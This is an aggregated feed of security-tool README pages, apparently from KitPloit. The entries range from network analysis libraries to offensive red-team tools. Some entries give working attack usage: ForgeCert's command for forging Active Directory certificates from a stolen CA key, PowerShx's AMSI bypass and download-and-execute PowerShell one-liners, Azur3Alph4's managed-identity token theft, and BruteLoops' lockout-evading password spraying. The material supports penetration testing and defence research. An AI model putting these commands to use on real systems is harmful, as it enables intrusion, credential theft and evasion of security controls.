๐Ÿ”’
There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

Networkit - A Growing Open-Source Toolkit For Large-Scale Network Analysis

15 October 2021 at 11:30
By: Zion3R



NetworKit is an open-source tool suite for high-performance network analysis. Its aim is to provide tools for the analysis of large networks in the size range from thousands to billions of edges. For this purpose, it implements efficient graph algorithms, many of them parallel to utilize multicore architectures. These are meant to compute standard measures of network analysis. NetworKit is focused on scalability and comprehensiveness. NetworKit is also a testbed for algorithm engineering and contains novel algorithms from recently published research (see list of publications below).

NetworKit is a Python module. High-performance algorithms are written in C++ and exposed to Python via the Cython toolchain. Python in turn gives us the ability to work interactively and a rich environment of tools for data analysis and scientific computing. Furthermore, NetworKit's core can be built and used as a native library if needed.


Requirements

You will need the following software to install NetworKit as a python package:

  • A modern C++ compiler, e.g.: g++ (>= 6.1), clang++ (>= 3.9) or MSVC (>= 14.13)
  • OpenMP for parallelism (usually ships with the compiler)
  • Python3 (3.6 or higher is supported)
    • Development libraries for Python3. The package name depends on your distribution. Examples:
      • Debian/Ubuntu: apt-get install python3-dev
      • RHEL/CentOS: dnf install python3-devel
      • Windows: Use the official release installer from www.python.org
  • Pip
  • CMake version 3.6 or higher (Advised to use system packages if available. Alternative: pip3 install cmake)
  • Build system: Make or Ninja
  • Cython version 0.29 or higher (e.g., pip3 install cython)

Install

In order to use NetworKit, you can either install it via package managers or build the Python module from source.


Install via package manager

While the most recent version is in general available for all package managers, the number of older downloadable versions differ.


pip
pip3 install [--user] networkit

conda (channel conda-forge)
conda config --add channels conda-forge
conda install networkit [-c conda-forge]

brew
brew install networkit

spack
spack install py-networkit

Building the Python module from source
git clone https://github.com/networkit/networkit networkit
cd networkit
python3 setup.py build_ext [-jX]
pip3 install -e .

The script will call cmake and ninja (make as fallback) to compile NetworKit as a library, build the extensions and copy it to the top folder. By default, NetworKit will be built with the amount of available cores in optimized mode. It is possible the add the option -jN the number of threads used for compilation.


Usage example

To get an overview and learn about NetworKit's different functions/classes, have a look at our interactive notebooks-section, especially the Networkit UserGuide. Note: To view and edit the computed output from the notebooks, it is recommended to use Jupyter Notebook. This requires the prior installation of NetworKit. You should really check that out before start working on your network analysis.

We also provide a Binder-instance of our notebooks. To access this service, you can either click on the badge at the top or follow this link. Disclaimer: Due to rebuilds of the underlying image, it can takes some time until your Binder instance is ready for usage.

If you only want to see in short how NetworKit is used - the following example provides a climpse at that. Here we generate a random hyperbolic graph with 100k nodes and compute its communities with the PLM method:

>>> import networkit as nk
>>> g = nk.generators.HyperbolicGenerator(1e5).generate()
>>> communities = nk.community.detectCommunities(g, inspect=True)
PLM(balanced,pc,turbo) detected communities in 0.14577102661132812 [s]
solution properties:
------------------- -----------
# communities 4536
min community size 1
max community size 2790
avg. community size 22.0459
modularity 0.987243
------------------- -----------

Install the C++ Core only

In case you only want to work with NetworKit's C++ core, you can either install it via package managers or build it from source.


Install C++ core via package manager

conda (channel conda-forge)
conda config --add channels conda-forge
conda install libnetworkit [-c conda-forge]

brew
brew install libnetworkit

spack
spack install libnetworkit

Building the C++ core from source

We recommend CMake and your preferred build system for building the C++ part of NetworKit.

The following description shows how to use CMake in order to build the C++ Core only:

First you have to create and change to a build directory: (in this case named build)

mkdir build
cd build

Then call CMake to generate files for the make build system, specifying the directory of the root CMakeLists.txt file (e.g., ..). After this make is called to start the build process:

cmake ..
make -jX

To speed up the compilation with make a multi-core machine, you can append -jX where X denotes the number of threads to compile with.


Use NetworKit as a library

This paragraph explains how to use the NetworKit core C++ library in case it has been built from source. For how to use it when installed via package managers, best refer to the official documentation (brew, conda, spack).

In order to use the previous compiled networkit library, you need to have it installed, and link it while compiling your project. Use these instructions to compile and install NetworKit in /usr/local:

cmake ..
make -jX install

Once NetworKit has been installed, you can use include directives in your C++-application as follows:

#include <networkit/graph/Graph.hpp>

You can compile your source as follows:

g++ my_file.cpp -lnetworkit

Unit tests

Building and running NetworKit unit tests is not mandatory. However, as a developer you might want to write and run unit tests for your code, or if you experience any issues with NetworKit, you might want to check if NetworKit runs properly. The unit tests can only be run from a clone or copy of the repository and not from a pip installation. In order to run the unit tests, you need to compile them first. This is done by setting the CMake NETWORKI_BUILD_TESTS flag to ON:

cmake -DNETWORKIT_BUILD_TESTS=ON ..

Unit tests are implemented using GTest macros such as TEST_F(CentralityGTest, testBetweennessCentrality). Single tests can be executed with:

./networkit_tests --gtest_filter=CentralityGTest.testBetweennessCentrality

Additionally, one can specify the level of the logs outputs by adding --loglevel <log_level>; supported log levels are: TRACE, DEBUG, INFO, WARN, ERROR, and FATAL.


Compiling with address/leak sanitizers

Sanitizers are great tools to debug your code. NetworKit provides additional Cmake flags to enable address, leak, and undefined behavior sanitizers. To compile your code with sanitizers, set the CMake NETWORKIT_WITH_SANITIZERS to either address or leak:

cmake -DNETWORKIT_WITH_SANITIZERS=leak ..

By setting this flag to address, your code will be compiled with the address and the undefined sanitizers. Setting it to leak also adds the leak sanitizer.


Documentation

The most recent version of the documentation can be found online.


Contact

For questions regarding NetworKit, have a look at our issues-section and see if there is already an open discussion. If not feel free to open a new issue. To stay updated about this project, subscribe to our mailing list.


Contributions

We encourage contributions to the NetworKit source code. See the development guide for instructions. For support please contact the mailing list.


Credits

List of contributors can be found on the NetworKit website credits page.


External Code

The program source includes:


License

The source code of this program is released under the MIT License. We ask you to cite us if you use this code in your project (c.f. the publications section below and especially the technical report). Feedback is also welcome.


Publications

The NetworKit publications page lists the publications on NetworKit as a toolkit, on algorithms available in NetworKit, and simply using NetworKit. We ask you to cite the appropriate ones if you found NetworKit useful for your own research.



ForgeCert - "Golden" Certificates

14 October 2021 at 20:30
By: Unknown


ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.

This attack is codified as DPERSIST1 in our "Certified Pre-Owned" whitepaper. This code base was released ~45 days after the whitepaper was published.

@tifkin_ is the primary author of ForgeCert.

@tifkin_ and @harmj0y are the primary authors of the associated Active Directory Certificate Service research (blog and whitepaper).


Background

As described in the Background and Forging Certificates with Stolen CA Certificates - DPERSIST1 sections of our whitepaper, the private key for a Certificate Authority's CA certificate is protected on the CA server either via DPAPI or hardware (HSM/TPM). Additionally, the certificate (sans private key) is published to the NTAuthCertificates forest object, which defines CA certificates that enable authentication to AD. Put together, a CA whose certificate is present in NTAuthCertificates uses its private key to sign certificate signing requests (CSRs) from requesting clients. This graphic summarizes the process:

The security of the CA's private key is paramount. As mentioned, if the private key is not protected by a hardware solution like a TPM or a HSM, the key will be encrypted with the Data Protection API (DPAPI) and stored on disk on the CA server. If an attacker is able to compromise a CA server, they can extract the private key for any CA certificate not protected by hardware by using @gentilkiwi's Mimikatz or GhostPack's SharpDPAPI project. THEFT3 in the whitepaper describes this process for machine certificates.

Because the only key material used to sign issued certificates is the CA's private key, if an attacker steals such a key (for a certificate in NTAuthCertificates) they can forge certificates capable of domain authentication. These forged certificates can be for any principal in the domain (though the account needs to be "active" for authentication to be possible, so accounts like krbtgt will not work) and the certificates will be valid for as long as the CA certificate is valid (usually 5 years by default but can be set to be longer).

Also, as these certificates are not a product of the normal issuance process, the CA is not aware that they were created. Thus, the certificates cannot be revoked.

Note: the private key for ANY CA certificate in NTAuthCertificates (root or subordinate CA) can be used to forge certificates capable of authentication in the forest. If the certificate/key is from a subordinate CA, a legitimate CRL for verification of the certificate chain must be supplied.

ForgeCert uses the BouncyCastle's X509V3CertificateGenerator to perform the forgeries.


Command Line Usage
C:\Temp>ForgeCert.exe
ForgeCert 1.0.0.0
Copyright c 2021

ERROR(S):
Required option 'CaCertPath' is missing.
Required option 'SubjectAltName' is missing.
Required option 'NewCertPath' is missing.
Required option 'NewCertPassword' is missing.

--CaCertPath Required. CA private key as a .pfx or .p12 file

--CaCertPassword Password to the CA private key file

--Subject (Default: CN=User) Subject name in the certificate

--SubjectAltName Required. UPN of the user to authenticate as

--NewCertPath Required. Path where to save the new .pfx certificate

--NewCertPassword Required. Password to the .pfx file

--CRL ldap path to a CRL for the forged certificate

--help Display this help screen.

--version Display version information.


Usage

Note: for a complete walkthrough of stealing a CA private key and forging auth certs, see DPERSIST1 in the whitepaper.

Context:

  • The stolen CA's certificate is ca.pfx, encrypted with a password of Password123!
  • The subject is arbitrary since we're specifying a subject alternative name for the certificate.
  • The subject alternative name (i.e., the user we're forging a certificate for), is [email protected].
  • The forged certificate will be saved as localadmin.pfx, encrypted with the password NewPassword123!
C:\Tools\ForgeCert>ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "Password123!" --Subject "CN=User" --SubjectAltName "[email protected]" --NewCertPath localadmin.pfx --NewCertPassword "NewPassword123!"
CA Certificate Information:
Subject: CN=theshire-DC-CA, DC=theshire, DC=local
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 1/4/2021 10:48:02 AM
End Date: 1/4/2026 10:58:02 AM
Thumbprint: 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
Serial: 14BFC25F2B6EEDA94404D5A5B0F33E21

Forged Certificate Information:
Subject: CN=User
SubjectAltName: [email protected]
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 7/26/2021 3:38:45 PM
End Date: 7/26/2022 3:38:45 PM
Thumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D
Serial: 3627A48F90F6869C3215FF05BC3B2E42

Done. Save d forged certificate to localadmin.pfx with the password 'NewPassword123!'

This forgery can be done on an attacker-controlled system, and the resulting certificate can be used with Rubeus to request a TGT (and/or retrieve the user's NTLM ;)


Defensive Considerations

The TypeRefHash of the current ForgeCert codebase is b26b451ff2c947ae5904f962e56facbb45269995fbb813070386472f307cfcf0.

The TypeLib GUID of ForgeCert is bd346689-8ee6-40b3-858b-4ed94f08d40a. This is reflected in the Yara rules currently in this repo.

See PREVENT1, DETECT3, and DETECT5 in our whitepaper for prevention and detection guidance.

Fabian Bader published a great post on how to mitigate many uses of "Golden Certificates" through OSCP tweaks. Note thought that in the Final Thoughts section he mentions This method is not bulletproof at all. Since the attacker is in charge of the certificate creation process, she could just change the serial number to a valid one. This was implemented in his PR, though remember that by default the serial number will be randomized, meaning the OSCP prevention should work in many cases and is worth implementing in our opinion.

We believe there may opportunities to build Yara/other detection rules for types of forged certificates this project produces - if any defensive researchers find a good way to signature these files, please let us know and we will update the Yara rules/defensive guidance here.


Reflections

There is a clear parallel between "Golden Tickets" (forged TGTs) and these "Golden Certificates" (forced AD CS certs). Both the krbtgt hash and CA private key are cryptographic material critical to the security of an Active Directory environment, and both can be used to forge authenticators for arbitrary users. However, while the krbtgt hash can be retrieved remotely over DCSync, a CA private key must (at least as far as we know) be recovered through code execution on the CA machine itself. While a krbtgt hash can be rotated relatively easily, rotating a CA private key is significantly more difficult.

On the subject of public disclosure, we self-embargoed the release of our offensive tooling (ForgeCert as well as Certify) for ~45 days after we published our whitepaper in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept.

This is reflected in some people's reaction to the research of this IS StUPId, oF COurse YoU Can FORge CERts WITH ThE ca PriVAtE KeY. To which we state, yes, many things are possible, but PoC||GTFO



Xmap - A Fast Network Scanner Designed For Performing Internet-wide IPv6 &Amp; IPv4 Network Research Scanning

14 October 2021 at 11:30
By: Zion3R


XMap is a fast network scanner designed for performing Internet-wide IPv6 & IPv4 network research scanning.

XMap is reimplemented and improved thoroughly from ZMap and is fully compatible with ZMap, armed with the "5 minutes" probing speed and novel scanning techniques. XMap is capable of scanning the 32-bits address space in under 45 minutes. With a 10 gigE connection and PF_RING, XMap can scan the 32-bits address space in under 5 minutes. Moreover, leveraging the novel IPv6 scanning approach, XMap can discover the IPv6 Network Periphery fast. Furthermore, XMap can scan the network space randomly with any length and at any position, such as 2001:db8::/32-64 and 192.168.0.1/16-20. Besides, XMap can probe multiple ports simultaneously.

XMap operates on GNU/Linux, Mac OS, and BSD. XMap currently has implemented probe modules for ICMP Echo scans, TCP SYN scans, and UDP probes.

With banner grab and TLS handshake tool, ZGrab2, more involved scans could be performed.


Installation

The latest stable release of XMap is version 1.0.0 and supports Linux, macOS, and BSD. We recommend installing XMap from HEAD rather than using a distro package manager (not supported yet).

Instructions on building XMap from source can be found in INSTALL.


Usage

A guide to using XMap can be found in our GitHub Wiki.

Simple commands and options to using XMap can be found in USAGE.


Paper

Fast IPv6 Network Periphery Discovery and Security Implications.

Abstract. Numerous measurement researches have been performed to discover the IPv4 network security issues by leveraging the fast Internet-wide scanning techniques. However, IPv6 brings the 128-bits address space and renders brute-force network scanning impractical. Although significant efforts have been dedicated to enumerating active IPv6 hosts, limited by technique efficiency and probing accuracy, large-scale empirical measurement studies under the increasing IPv6 networks are infeasible now.

To fill this research gap, by leveraging the extensively adopted IPv6 address allocation strategy, we propose a novel IPv6 network periphery discovery approach. Specifically, XMap, a fast network scanner, is developed to find the periphery, such as a home router. We evaluate it on twelve prominent Internet service providers and harvest 52M active peripheries. Grounded on these found devices, we explore IPv6 network risks of the unintended exposed security services and the flawed traffic routing strategies. First, we demonstrate the unintended exposed security services in IPv6 networks, such as DNS, and HTTP, have become emerging security risks by analyzing 4.7M peripheries. Second, by inspecting the peripheryโ€™s packet routing strategies, we present the flawed implementations of IPv6 routing protocol affecting 5.8M router devices. Attackers can exploit this common vulnerability to conduct effective routing loop attacks, inducing DoS to the ISPโ€™s and home routers with an amplification factor of >200. We responsibly disclose those issues to all involved vendors and ASes and discuss mitigation solutions. Our research results indicate that the security community should revisit IPv6 network strategies immediately.

Authors. Xiang Li, Baojun Liu, Xiaofeng Zheng, Haixin Duan, Qi Li, Youjun Huang.

Conference. Proceedings of the 2021 IEEE/IFIP International Conference on Dependable Systems and Networks (DSN '21)

Paper. [PDF], [Slides] and [Video].

CNVD/CVE. [Lists].


License and Copyright

XMap Copyright 2021 Xiang Li from Network and Information Security Lab Tsinghua University

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See LICENSE for the specific language governing permissions and limitations under the License.



PowerShx - Run Powershell Without Software Restrictions

13 October 2021 at 20:30
By: Zion3R


Unmanaged PowerShell execution using DLLs or a standalone executable.


Introduction

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.


Features
  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32
rundll32 PowerShx.dll,main -e                           <PS script to run>
rundll32 PowerShx.dll,main -f <path> Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):
1. 
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

.exe version
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path> Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded payloads

Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict["amsi"]);
}

Examples

Run a base64 encoded script
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode


Run a base64 encoded script
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

Requirements

.NET 4


Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interractive mode and command output rely on hijacking the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.



Rdesktop - Open Source Client for Microsoft's RDP protocol

13 October 2021 at 11:30
By: Zion3R


rdesktop is an open source client for Microsoft's RDP protocol. It is known to work with Windows versions ranging from NT 4 Terminal Server to Windows 2012 R2 RDS. rdesktop currently has implemented the RDP version 4 and 5 protocols.


Installation

rdesktop uses a GNU-style build procedure. Typically all that is necessary to install rdesktop is the following:

% ./configure
% make
% make install

The default is to install under /usr/local. This can be changed by adding --prefix=<directory> to the configure line.

The smart-card support module uses PCSC-lite. You should use PCSC-lite 1.2.9 or later. To enable smart-card support in the rdesktop add --enable-smartcard to the configure line.


Note for users building from source

If you have retrieved a snapshot of the rdesktop source, you will first need to run ./bootstrap in order to generate the build infrastructure. This is not necessary for release versions of rdesktop.


Usage

Connect to an RDP server with:

% rdesktop server

where server is the name of the Terminal Services machine. If you receive "Connection refused", this probably means that the server does not have Terminal Services enabled, or there is a firewall blocking access.

You can also specify a number of options on the command line. These are listed in the rdesktop manual page (run man rdesktop).



Shisho - Lightweight Static Analyzer For Several Programming Languages

12 October 2021 at 20:30
By: Zion3R


Shisho is a lightweight static analyzer for developers.


Please see the usage documentation for further information.



Try at Playground

You can try Shisho at our playground.


Try with Docker

You can try shisho in your machine as follows:

echo "func test(v []string) int { return len(v) + 1; }" | docker run -i ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go
echo "func test(v []string) int { return len(v) + 1; }" > file.go
docker run -i -v $(PWD):/workspace ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go /workspace/file.go

Install with pre-built binaries

When you'd like to run shisho outside docker containers, please follow the instructions below:


Linux / macOS

Run the following command(s):

# Linux
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-unknown-linux-gnu.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

# macOS
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-apple-darwin.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

Then you'll see a shisho's executable in /usr/local/bin.


Windows

Download the prebuild binary from releases and put it into your %PATH% directory.

If you're using Windows Subsystem for Linux, you can install shisho with the above instructions.


More


LinuxCatScale - Incident Response Collection And Processing Scripts With Automated Reporting Scripts

12 October 2021 at 11:30
By: Zion3R


Linux CatScale is a bash script that uses live of the land tools to collect extensive data from Linux based hosts. The data aims to help DFIR professionals triage and scope incidents. An Elk Stack instance also is configured to consume the output and assist the analysis process.


Usage

This scripts were built to automate as much as possible. We recommend running it from an external device/usb to avoid overwriting evidence. Just in case you need a full image in future.

Please run the collection script on suspected hosts with sudo rights. fsecure_incident-response_linux_collector_0.7.sh the only file you need to run the collection.

[email protected]:<dir>$ chmod +x ./Cat-Scale.sh
[email protected]:<dir>$ sudo ./Cat-Scale.sh

The script will create a directory called "FSecure-out" in the working directory and should remove all artefacts after being compressed. This will leave a filename in the format of FSecure_Hostname-YYMMDD-HHMM.tar.gz

Once these are all aggregated and you have the FSecure_Hostname-YYMMDD-HHMM.tar.gz on the analysis machine. You can run Extract-Cat-Scale.sh which will extract all the files and place them in a folder called "extracted".

[email protected]:<dir>$ chmod +x ./Extract-Cat-Scale.sh
[email protected]:<dir>$ sudo ./Extract-Cat-Scale.sh

Parsing

This project has predefined grok filters to ingest data into elastic, feel free to modify them as you need.


What does it collect?

This script will procude the following files/folders which can be reviewed as text files or using Elk Stack.

Resolver configuration file resolv.conf executables-list.txt - All ELF files on disk with +x attribute group.txt - List of groups and the members belonging to each group home-dir-timeline - Timeline of all files in /home/* host.conf.txt - Resolver configuration file host.conf hosts.allow.txt - Host access control file hosts.allow hosts.deny.txt - Host access control file hosts.deny hosts.txt - Static table lookup for hostnames /etc/hosts ifconfig.txt - ifconfig -a Output iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel. lastbad.txt - Records failed login attempts lastlog.txt - The most recent login of all users or of a given user last.txt - History of all logins and logouts lsmod.txt - Kernel modules are currently loaded lsof-processes.txt - List of all open files and the processes that opened them. lsusb.txt - Attached USB device info md5-ps.txt - ps command bin md5 meminfo.txt - Memory info netstat-ano.txt - Listing All Sockets, in numeric form with timer info netstat-antup.txt - All tcp/udp connection in numeric form with process ID netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers num-proc.txt - number of processes according to ps command num-ps.txt - number of processes according to /proc directory package-list.txt - All files in all rpm packages packages-result.txt - all executables that are not part of rpm packages passwd.txt - Copy of the passwd file persistence-anacron.txt - All Anacron jobs persistence-cronlist.txt - All Cron jobs persistence-initd.txt - All initd scripts persistence-profiled.txt - Scripts that run when User logs in persistence-rc-scripts.txt - All rc scripts. (run level scipts) persistence-shellrc-etc.txt - All startup script contents in /etc/ persistence-shellrc-home.txt - All startup script contents in /home/ persistence-shellrc-root.txt - All startup script contents in /root/ persistence-systemdlist.txt - All systemd services and execution commandlines process-details.txt - All running process details and status information processes-list.txt - All running process acording to ps processes.txt - All running process acording to /proc/ directory processhashes.txt - Hash of all running processes procmod.txt - Loaded modules for all processes release.txt - OS information routetable.txt - Contents of kernel routing table. route command output sbin-dir-timeline - Timeline of all files in /sbin/* service_status.txt - All running service and their status. ssh_config.txt - ssh service config file sshd_config.txt - ssh service config file sudoers.txt - List of sudoers tmp-dir-timeline - Timeline of all files in /tmp/* tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages tmp-executable-files.txt - All files with +x attributes (executables) tmp-types.txt - tmp file for Find types of executable(script\|ELF\|executable) var-www-dir-timeline - Timeline of all files in /var/www/* whoandwhat.txt - w command output. Who is logged on and what they are doing. who.txt - List of users who are currently logged in wtmp-lastlog.txt - wtmp last log varlogs - All contents of /var/log viminfo - All viminfo files... Can contain vi historic commands ">
bash_history                    - Bash history for all users
bash_profile - Bash profile file for all users
bash_rc - Bash_rc file
full-timeline.csv - Timeline of all files in the following directories: /home/* + var/www/* + /tmp/ + /dev/shm/ + /bin + /sbin
bin-dir-timeline - Timeline of all files in /bin
binhashes.txt - Hash of all executable files under $PATH variable
btmp-lastlog.txt - btmp last log
console-error-log.txt - This were all the errors from the script is forwarded to
cpuinfo.txt - CPU info
dev-shm-dir-timeline - Timeline of all files in /dev/shm/
df.txt - Information about the file system on which each FILE resides,or all file systems by default.
dhcp.txt - Resolver configuration file resolv.conf
executables-list.tx t - All ELF files on disk with +x attribute
group.txt - List of groups and the members belonging to each group
home-dir-timeline - Timeline of all files in /home/*
host.conf.txt - Resolver configuration file host.conf
hosts.allow.txt - Host access control file hosts.allow
hosts.deny.txt - Host access control file hosts.deny
hosts.txt - Static table lookup for hostnames /etc/hosts
ifconfig.txt - ifconfig -a Output
iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel.
lastbad.txt - Records failed login attempts
lastlog.txt - The most recent login of all users or of a given user
last.txt - History of all logins and logouts
lsmod.txt - Kernel modules are currently loaded
lsof-processes.txt - List of all open files and the processes that opened them.
lsusb.txt - Attached USB device info
md5-ps.txt - ps command bin md5
meminfo.txt - Memory info
netstat-ano.txt - Listing All Sockets, in numeric form with timer info
netstat-antup.txt - All tcp/udp connection in numeric form with process ID
netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers
num-proc.txt - number of processes according to ps command
num-ps.txt - number of processes according to /proc directory
package-list.txt - All files in all rpm packages
packages-result.txt - all executables that are not part of rpm packages
passwd.txt - Copy of the passwd file
persistence-anacron.txt - All Anacron jobs
persistence-cronlist.txt - All Cron jobs
persistence-initd.txt - All initd scripts
persistence-profiled.txt - Scripts that run when User logs in
persistence-rc-scripts.txt - All rc scripts. (run level scipts)
persistence-shellrc-etc.txt - All startup script contents in /etc/
persistence-shellrc-home.txt - All startup script contents in /home/
persistence-shellrc-root.txt - All startup script contents in /root/
persistence-systemdlist.txt - All systemd services and execution commandlines
process-details.txt - All running process details and status information
processes-list.txt - All running process acording to ps
processes.txt - All running process acording to /proc/ directory
processhashes.txt - Hash of all running processes
procmod.txt - Loaded modules for all processes
release.txt - OS information
routetable.txt - Contents of kernel routing table. route command output
sbin-dir-timeline - Timeline of all files in /sbin/*
service_status.txt - All running service and their status.
ssh_config.txt - ssh service config file
sshd_config.txt - ssh service config file
sudoers.txt - List of sudoers
tmp-dir-timeline - Timeline of all files in /tmp/*
tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages
tmp-executable-files.txt - All files with +x attributes (executables)
tmp-types.txt - tmp file for Find types of executable(script\|ELF\|executable)
var-www-dir-timeline - Timeline of all files in /var/www/*
whoandwhat.txt - w command output. Who is logged on and what they are doing.
who.txt - List of users who are currently logged in
wtmp-lastlog.txt - wtmp last log
varlogs - All contents of /var/log
viminfo - All viminfo files... Can contain vi historic commands

Disclaimer

Note that the script will likely alter artefacts on endpoints. Care should be taken when using the script. This is not meant to take forensically sound disk images of the remote endpoints.


Tested OSes
  • Ubuntu 16.4
  • Centos
  • Mint
  • Solaris 11.4


Azur3Alph4 - A PowerShell Module That Automates Red-Team Tasks For Ops On Objective

11 October 2021 at 20:30
By: Zion3R


Azur3Alph4 is a PowerShell module that automates red-team tasks for ops on objective. This module situates in a post-breach (RCE achieved) position. Token extraction and many other tools will not execute successfully without starting in this position. This module should be used for further enumeration and movement in a compromised app that is part of a managed identity.
Azur3Alph4 is currently in development. Modules are being worked on and updated. Most of this is still untested.

Scripts are in repo for individual use and easy identification, but the .psm1 file is what will be consistently updated.


Installation & Usage

Import-Module Azur3Alph4

Point the $envendpoint to cmd execution passing "env" to the Azure backend.


Updates - 8/10/2021
  • Added Get-ResourceActions.ps1 and updated Azur3Alph4.psm1

Updates - 8/5/2021
  • Made Azur3Alph4 modular
  • Added Get-SubscriptionId function

Why This Was Built
  • I built this because I wanted to learn more about both PowerShell and Azure, two things I'd definitely like to get better at.
  • To help automate and eliminate a lot of repetitive PS commands.
  • To build off my current knowledge of Azure red teaming

Function List

Get-Endpoint

Enumerates an Azure endpoint to verify whether or not it belongs to a managed identity


Get-ManagedIdentityToken

Grabs the Managed Identity Token from the endpoint using the extracted secret. Stores the value in a given variable


Connect-AzAccount

Takes a username and password variable and automates SecureString conversion and connects to an Azure account


Get-SubscriptionId

Gets the subscription ID using the REST API for Azure


Get-ManagedIdentityResources

Uses the subscription ID to enumerate all resources that are accessible


Get-ResourceActions.ps1

Enumerates all resources available using Azure token and lists permissions of each resource directly below it


Credits
  • Big shout out to @nikhil_mitt for the CARTP course that got me started in Azure


BruteLoops - Protocol Agnostic Online Password Guessing API

11 October 2021 at 11:30
By: Zion3R


A dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces.

See various Wiki sections for more information.

A "modular" example is included with the library that demonstrates how to use this package. It's fully functional and provides multiple brute force modules. Below is a sample of its capabilities:


authentication module for training/testing ">
http.accellion_ftp  Accellion FTP HTTP interface login module
http.basic_digest Generic HTTP basic digest auth
http.basic_ntlm Generic HTTP basic NTLM authentication
http.global_protect
Global Protect web interface
http.mattermost Mattermost login web interface
http.netwrix Netwrix web login
http.okta Okta JSON API
http.owa2010 OWA 2010 web interface
http.owa2016 OWA 2016 web interface
smb.smb Target a single SMB server
testing.fake Fake authentication module for training/testing

Key Features
  • Protocol agnostic - If a callback can be written in Python, BruteLoops can be used to attack it
  • SQLite support - All usernames, passwords, and credentials are maintained in an SQLite database.
    • A companion utility (dbmanager.py) that creates and manages input databases accompanies BruteLoops
  • Spray and Stuffing Attacks in One Tool - BruteLoops supports both spray and stuffing attacks in the same attack logic and database, meaning that you can configure a single database and run the attack without heavy reconfiguration and confusion.
  • Guess scheduling - Each username in the SQLite database is configured with a timestamp that is updated after each authentication event. This means we can significantly reduce likelihood of locking accounts by scheduling each authentication event with precision.
  • Fine-grained configurability to avoid lockout events - Microsoft's lockout policies can be matched 1-to-1 using BruteLoop's parameters:
    • auth_threshold = Lockout Threshold
    • max_auth_jitter = Lockout Observation Window
    • Timestampes associated with each authentication event are tracked in BruteLoops' SQLite database. Each username receives a distinct timestamp to assure that authentication events are highly controlled.
  • Attack resumption - Stopping and resuming an attack is possible without worrying about losing your place in the attack or locking accounts.
